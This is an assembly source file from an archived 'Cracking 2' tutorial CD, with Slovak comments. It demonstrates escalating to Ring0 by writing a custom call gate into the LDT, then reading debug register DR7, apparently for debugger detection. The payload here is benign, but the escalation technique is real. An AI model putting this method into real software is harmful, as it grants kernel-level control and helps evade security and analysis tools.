home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Cracking 2
/
Cracking II..iso
/
Priklady
/
Priklad 37
/
A
/
DETECT37.ASM
next >
Wrap
Assembly Source File
|
2000-08-14
|
4KB
|
110 lines
.386p
.MODEL FLAT,STDCALL
locals
jumps
UNICODE=0
include w32.inc
Extrn SetUnhandledExceptionFilter : PROC
.data
sprava1 db "Ukazka prepnutia do RING0 pomocou LDT",0
sprava2 db "Nastala chyba",0
sprava3 db "Ring0 bol uspesne aktivovany",0
odlozESP dd 0 ;sem uklada register ESP
predchadzajuca dd 0 ;sem uklada adresu predchadzajucej obsluhy SEH
gdt_ df 0
call_ dd 00
dw 0Fh
o_gate dw 0
dw 028h ; segment pre RING0
dw 0EC00h
dw 0
.code
Start:
;----------------------------------------------------------------------------
;NASTAVI SEH PRE PRIPAD CHYBY
;----------------------------------------------------------------------------
mov [odlozESP],esp
push offset chyba
call SetUnhandledExceptionFilter
mov [predchadzajuca], eax
;----------------------------------------------------------------------------
mov eax, offset ring0 ;do registra eax da offset nasej obsluhy pre RING0
mov [o_gate],ax ;nastavi adresu nasej novej obsluhy RING0 do nasej "callgate"
shr eax,16
mov [o_gate+6],ax
xor eax, eax
sgdt fword ptr gdt_ ;ulozi GDT
mov ebx,dword ptr [gdt_+2] ;ziskame base adresu GDT
sldt ax
add ebx,eax ;ziskame adresu discriptora
mov al,[ebx+4]
mov ah,[ebx+7]
shl eax,16 ;v registri eax ziskame adresu LDT
mov ax,[ebx+2] ;pridanim do eax ziskame adresu discriptora callgate
add eax,8
mov edi,eax ;nastavi sa v callgate na miesto kde zacneme so zmenami
mov esi,offset o_gate ;do registra esi da adresu nasej "callgate"
movsd ;a presunie ju do realnej callgate
movsd ;tym pripravi skok do RING0
call fword ptr [call_] ;skok do RING0 na nasu obsluhu
xor eax, eax
sub edi,8 ;nuluje nase zmeny v callgate
stosd
stosd
;----------------------------------------------------------------------------
;NASTAVI PREDCHADZAJUCU OBSLUHU SEH
;----------------------------------------------------------------------------
push dword ptr [predchadzajuca]
call SetUnhandledExceptionFilter
;----------------------------------------------------------------------------
jmp skok ;skoci, ak bolo prepnutie do RING0 uspesne
continiue:
call MessageBoxA,0, offset sprava2, offset sprava1,0
call ExitProcess, -1
skok:
call MessageBoxA,0, offset sprava3, offset sprava1,0
call ExitProcess, -1
chyba: ;nova obsluha SEH pre pripad chyby
mov esp, [odlozESP]
push offset continiue
ret
;-----------------------------------------------------------------------------
;NASA NOVA OBSLUHA RING0
;-----------------------------------------------------------------------------
ring0:
mov eax, dr7 ;tato instrukcia je funkcna iba v RING0
retf ;spat do RING3
ends
end Start
